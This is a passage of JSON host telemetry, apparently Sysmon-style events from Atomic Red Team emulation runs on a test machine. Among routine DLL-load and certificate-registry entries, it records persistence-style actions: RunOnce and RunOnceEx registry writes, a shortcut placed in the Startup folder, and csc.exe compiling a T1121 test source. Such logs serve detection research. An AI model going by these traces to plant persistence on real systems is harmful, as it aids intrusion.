"process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854330000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1484, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854490000, - "unique_pid": 
"{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1484, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1484, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 1484, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 1484, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1484, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1484, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "registry", - "pid": 1484, - "process_name": "reg.exe", - 
"process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend\\1", - "registry_value": "1", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "process", - "pid": 1484, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "process", - "pid": 3792, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 1688, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570854620000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1688, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1688, - "process_name": "cmd.exe", - "process_path": 
"C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1688, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1688, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854650000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1688, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854650000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" - }, - { - "event_type": "process", - "pid": 1688, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570854650000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\NextRun", - "registry_value": "NextRun", - "timestamp": 131883570855110000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\NextRun", - "registry_value": "NextRun", - "timestamp": 131883570855270000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "file", - "file_name": "Notepad.lnk", - "file_path": "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\Notepad.lnk", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "timestamp": 131883570856830000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library C:\\AtomicRedTeam\\atomics\\T1121\\src\\T1121.cs\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4760, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570858150000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570858080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 
131883570858080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570858080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570858080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570858080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" - }, - { - "command_line": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library C:\\AtomicRedTeam\\atomics\\T1121\\src\\T1121.cs", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3592, - "ppid": 4760, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "subtype": "create", - "timestamp": 131883570858230000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}", - "unique_ppid": "{42FC7E13-CADD-5C05-0000-00108A214D01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - 
"timestamp": 131883570858400000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570858400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858550000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "csc.exe", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570858400000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858710000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": 